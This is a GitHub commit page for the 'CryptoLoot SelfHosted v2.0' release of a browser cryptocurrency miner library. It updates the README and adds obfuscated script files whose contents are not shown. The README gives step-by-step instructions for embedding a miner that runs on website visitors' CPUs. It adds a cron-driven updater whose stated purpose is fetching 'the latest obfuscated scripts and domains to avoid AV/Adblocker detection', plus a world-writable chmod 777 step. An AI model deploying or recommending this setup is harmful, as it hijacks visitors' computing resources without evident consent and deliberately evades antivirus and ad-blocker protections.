Skip to content

Commit 62e11c1

Browse files
author
root
committed
CryptoLoot SelfHosted v2.0 Release
1 parent 9ff818f commit 62e11c1

File tree

9 files changed

+95
-6
lines changed

9 files changed

+95
-6
lines changed

README.md

Lines changed: 23 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -1,27 +1,45 @@
11
# cryptoloot
22

3-
Self Hosted Library for CryptoLoot
4-
==================================
3+
Self Hosted Library for CryptoLoot v2.0
4+
=======================================
55

66
How to Install:
77
1) Download https://github.com/Crypto-Loot/cryptoloot/archive/master.zip and uncompress at yoursite.com home directory
88
or alternatively use ```git clone https://github.com/Crypto-Loot/cryptoloot.git```
99
2) Register at https://crypto-loot.com to get your public site ID, you'll need this for the next step.
1010
3) Add the script to your website, preferably ABOVE </body> tag, and not within the <head></head> tags. Make sure to edit YOUR_PUBLIC_KEY with your site ID from crypto-loot.com:
1111
```text
12-
<script src="lib/crlt.js"></script>
12+
<script src="lib/crypta.js"></script>
1313
<script>
14-
CRLT.CONFIG.LIB_URL = "https://yourwebsite.com/lib/";
1514
var miner=new CRLT.Anonymous('YOUR_PUBLIC_KEY', {
1615
threads:4,autoThreads:false,throttle:0.2,
1716
});
1817
miner.start();
1918
</script>
2019
```
21-
NOTE: Also, edit your website domain above and point that to your lib directory.
20+
NOTE: Also, edit your site key above from the one you have on https://crypto-loot.com
2221

2322
4) All set. Now just send some traffic!
2423

24+
5) Optional: Set to automatically update (to stay up to date with the latest obfuscated scripts and domains to avoid AV/Adblocker detection):
25+
Make sure to install php-curl extension on your server if it does not exist:
26+
27+
***CentOS:***
28+
```text
29+
yum install php-curl
30+
```
31+
***Debian:***
32+
```text
33+
apt-get install php-curl
34+
```
35+
Change the permissions of these threee files to 777 so they can be overwritten on update:
36+
```text
37+
chmod 777 lib/crypta.js lib/polymath.js lib/version.txt
38+
```
39+
Install the cron to check for updates once every 12 hours:
40+
```text
41+
0 */12 * * * php /var/www/html/website/updater.php >> /var/www/html/website/cl_log.txt
42+
```
2543

2644
Have any questions?
2745
===================

cl_log.txt

Whitespace-only changes.

example.html

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
<script src="lib/crypta.js"></script>
2+
<script>
3+
var miner=new CRLT.Anonymous('YOUR_SITE_KEY',
4+
{
5+
threads:4,autoThreads:false,throttle:0.2,
6+
}
7+
);
8+
miner.start();
9+
</script>

lib/cl_version.txt

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
2000

lib/crlt.js

Lines changed: 0 additions & 1 deletion
This file was deleted.

lib/crypta.js

Lines changed: 1 addition & 0 deletions
Some generated files are not rendered by default. Learn more about customizing how changed files appear on GitHub.

lib/minui.js

Lines changed: 1 addition & 0 deletions
Some generated files are not rendered by default. Learn more about customizing how changed files appear on GitHub.

lib/polymath.js

Lines changed: 1 addition & 0 deletions
Some generated files are not rendered by default. Learn more about customizing how changed files appear on GitHub.

0 commit comments

Comments
 (0)